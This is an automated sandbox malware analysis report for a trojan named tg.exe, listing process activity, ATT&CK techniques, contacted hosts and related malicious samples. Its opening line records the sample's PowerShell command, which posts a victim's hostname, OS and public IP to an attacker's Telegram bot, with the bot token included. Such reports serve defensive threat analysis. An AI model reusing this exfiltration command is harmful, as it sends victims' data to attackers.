Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "invoke-restmethod -uri 'https://api.telegram.org/bot7879910740:aaempll82moqqk9txwsc5yk5uz56ixr0bzq/sendmessage' -method post -body @{chat_id='6734985705' ; text=' @new device infected!!!, information: date: 2024-12-22 19:12:07, hostname: user-pc, os: win32nt 10.0.19045.0 microsoft windows nt 10.0.19045.0, architecture: 64-bit, public ip: 8.46.123.189'}"			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\tg.exe

Code function: 0_2_0040559A GetVersionExW,GetVersionExW,

0_2_0040559A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Command and Scripting Interpreter	1 Scripting	11 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	12 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
tg.exe	24%	ReversingLabs	Win32.Trojan.Generic
tg.exe	31%	Virustotal		Browse
tg.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	104.26.12.205	true	false		high
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/?format=text	false		high
https://api.telegram.org/bot7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ/sendMessage	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://api.ipify.org?format=text	tg.exe, 00000000.00000002.4150843497.0000000000950000.00000004.00000020.00020000.00000000.sdmp, tg.exe, 00000000.00000002.4150754804.0000000000940000.00000004.00000020.00020000.00000000.sdmp, tg.exe, 00000000.00000002.4150754804.0000000000947000.00000004.00000020.00020000.00000000.sdmp, D274.bat.0.dr	false	high
http://nuget.org/NuGet.exe	powershell.exe, 0000000D.00000002.1790251554.000001F2B3BE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1807136479.000001F2C23D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1807136479.000001F2C2295000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 0000000D.00000002.1790251554.000001F2B389B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.ipi	tg.exe, 00000000.00000002.4150754804.0000000000947000.00000004.00000020.00020000.00000000.sdmp	true	unknown
https://api.telegram.org	powershell.exe, 0000000D.00000002.1790251554.000001F2B356A000.00000004.00000800.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000D.00000002.1790251554.000001F2B3A73000.00000004.00000800.00020000.00000000.sdmp	false	high
http://crl.microsoft	powershell.exe, 0000000D.00000002.1790067889.000001F2B0694000.00000004.00000020.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000D.00000002.1790251554.000001F2B3A73000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot7879910740:aaempll82moqqk9txwsc5yk5uz56ixr0bzq/sendmessage	powershell.exe, 0000000D.00000002.1811694654.000001F2CA5E0000.00000004.00000020.00020000.00000000.sdmp	false	high
https://go.micro	powershell.exe, 0000000D.00000002.1790251554.000001F2B2E52000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.tele	powershell.exe, 0000000D.00000002.1790251554.000001F2B383B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 0000000D.00000002.1807136479.000001F2C2295000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 0000000D.00000002.1790251554.000001F2B3BE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1807136479.000001F2C23D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1807136479.000001F2C2295000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 0000000D.00000002.1807136479.000001F2C2295000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 0000000D.00000002.1807136479.000001F2C2295000.00000004.00000800.00020000.00000000.sdmp	false	high
https://oneget.orgX	powershell.exe, 0000000D.00000002.1790251554.000001F2B389B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/pscore68	powershell.exe, 0000000D.00000002.1790251554.000001F2B2221000.00000004.00000800.00020000.00000000.sdmp	false	high
http://api.telegram.org	powershell.exe, 0000000D.00000002.1790251554.000001F2B3803000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000D.00000002.1790251554.000001F2B2221000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 0000000D.00000002.1790251554.000001F2B3A73000.00000004.00000800.00020000.00000000.sdmp	false	high
https://oneget.org	powershell.exe, 0000000D.00000002.1790251554.000001F2B389B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot%botToken%/sendMessage	tg.exe, 00000000.00000002.4150843497.0000000000950000.00000004.00000020.00020000.00000000.sdmp, tg.exe, 00000000.00000002.4150754804.0000000000940000.00000004.00000020.00020000.00000000.sdmp, tg.exe, 00000000.00000002.4150754804.0000000000947000.00000004.00000020.00020000.00000000.sdmp, D274.bat.0.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false
104.26.12.205	api.ipify.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1579564
Start date and time:	2024-12-23 01:10:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	tg.exe
Detection:	MAL
Classification:	mal84.troj.spyw.evad.winEXE@26/14@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 26 Number of non-executed functions: 49
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.43
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:11:00	API Interceptor	61x Sleep call for process: powershell.exe modified
19:11:40	API Interceptor	9522214x Sleep call for process: tg.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	setup.exe	Get hash	malicious	Babadeda	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse
	user.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse
	8v1GZ8v1LF.exe	Get hash	malicious	Unknown	Browse
	HX Design.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, XWorm	Browse
	2QaN4hOyJs.exe	Get hash	malicious	XWorm	Browse
	Invoice DHL - AWB 2024 E4001 - 0000731.exe	Get hash	malicious	Snake Keylogger	Browse
104.26.12.205	jgbC220X2U.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=text
	xKvkNk9SXR.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	GD8c7ARn8q.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	8AbMCL2dxM.exe	Get hash	malicious	RCRU64, TrojanRansom	Browse	api.ipify.org/
	Simple2.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Ransomware Mallox.exe	Get hash	malicious	Targeted Ransomware	Browse	api.ipify.org/
	Yc9hcFC1ux.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	6706e721f2c06.exe	Get hash	malicious	Remcos	Browse	api.ipify.org/
	perfcc.elf	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	setup.exe	Get hash	malicious	Babadeda	Browse	104.26.13.205
	QUOTATION#008792.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	c9toH15OT0.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4a	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	billys.exe	Get hash	malicious	Meduza Stealer	Browse	172.67.74.152
	ruppert.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	DHL_231437894819.bat.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	4089137200.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	iviewers.dll	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	script.ps1	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
api.telegram.org	setup.exe	Get hash	malicious	Babadeda	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	149.154.167.220
	user.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	149.154.167.220
	8v1GZ8v1LF.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	HX Design.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse	149.154.167.220
	2QaN4hOyJs.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	Invoice DHL - AWB 2024 E4001 - 0000731.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	c9toH15OT0.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	setup.exe	Get hash	malicious	Babadeda	Browse	149.154.167.220
	AmsterdamCryptoLTD.exe	Get hash	malicious	LummaC, DarkComet, LummaC Stealer, Vidar	Browse	149.154.167.99
	GoldenContinent.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	149.154.167.99
	user.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	149.154.167.99
CLOUDFLARENETUS	setup.exe	Get hash	malicious	Babadeda	Browse	104.26.13.205
	AmsterdamCryptoLTD.exe	Get hash	malicious	LummaC, DarkComet, LummaC Stealer, Vidar	Browse	104.21.80.1
	WonderHack.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	installer.msi	Get hash	malicious	Unknown	Browse	172.67.164.25
	external.exe	Get hash	malicious	LummaC	Browse	104.21.19.35
	Loader.exe	Get hash	malicious	RHADAMANTHYS	Browse	172.64.41.3
	Launcher.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.151.193
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.191.144
	Full_Ver_Setup.exe	Get hash	malicious	LummaC	Browse	104.21.63.229

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	setup.exe	Get hash	malicious	Babadeda	Browse	149.154.167.220 104.26.12.205
	Loader.exe	Get hash	malicious	RHADAMANTHYS	Browse	149.154.167.220 104.26.12.205
	medicalanalysispro.exe	Get hash	malicious	RHADAMANTHYS	Browse	149.154.167.220 104.26.12.205
	winwidgetshp.mp4.hta	Get hash	malicious	LummaC	Browse	149.154.167.220 104.26.12.205
	Support.Client.exe	Get hash	malicious	ScreenConnect Tool	Browse	149.154.167.220 104.26.12.205
	NOTIFICATION_OF_DEPENDANTS_1.vbs	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.12.205
	NOTIFICATION_OF_DEPENDANTS.vbs	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.12.205
	HLMJbase.dll	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.12.205
	HLMJbase.dll	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.12.205
	swift-bootstrapper.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.12.205

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1588
Entropy (8bit):	5.613807879951881
Encrypted:	false
SSDEEP:	48:kSU4y4RQmFoUeCamfm9qr9tK8NLyku9OjlZS5GhNz:9HyIFKL2O9qr2KLy/OZZ4kNz
MD5:	D3F4558E09530E833BE4C5DE67AD222D
SHA1:	C1D34A38CE0125C5B05B5BABA63EFE0E27517327
SHA-256:	A77ED2AA673073E5D95AB915F598A6F54DF99860331D855B8D762291A74AFD19
SHA-512:	6BC9912B85CAB049234F57675AD01F504940529BAF4C8FF9DAED577263472B933B864D06D7B992C2386A52A844D320055B46CA2EE634FB99F3C1E3C23551A974
Malicious:	false
Preview:	@...e...........b...............................................@...............M6.]..O....PI.&........System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

C:\Users\user\AppData\Local\Temp\D272.tmp\D273.tmp\D274.bat

Download File

Process:	C:\Users\user\Desktop\tg.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1284
Entropy (8bit):	5.323297766564296
Encrypted:	false
